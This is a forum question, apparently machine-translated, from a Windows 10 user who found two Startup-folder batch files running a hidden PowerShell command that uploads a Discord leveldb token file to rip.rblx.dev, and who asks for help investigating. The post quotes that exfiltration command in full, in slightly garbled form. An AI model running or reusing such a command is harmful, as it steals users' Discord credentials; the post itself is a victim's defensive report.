What does this PowerShell script send Discord information to a random server?

By turning on my Windows 10 personal computer tonight, ConEmu has welcomed me and said that two PowerShell commands had been executed at startup. Both orders were the same thing:

powershell -windowstyle hidden -Command "& {& invoke-webrequest -method met -infile" C:  Users  foo  AppData  Roaming  Discord  Local Storage  leveldb  000005.ldb https: // rip.rblx.dev/ c /} "

The sources of these commands are two batch files in C: ProgramData Microsoft Windows Start Menu Programs Start – LVTUSIX.bat and LVTUSIXd.bat. Both files were created this morning while I was away from my computer (about 30 minutes after turning it on). I'm not aware of a way to see who / what created the files – they belong to the group of administrators.

I can not find anything online on rip.rblx.dev or these batch files. A whois search on the domain reveals that all information is protected.

I am very suspicious as some researches reveal that these .ldb files contain Discord user identification information.

Does anyone know about what might happen? If not, does anyone have any advice on how I could find more information? Since then, I have temporarily mutilated the files to prevent them from running until I learn more. Thank you in advance.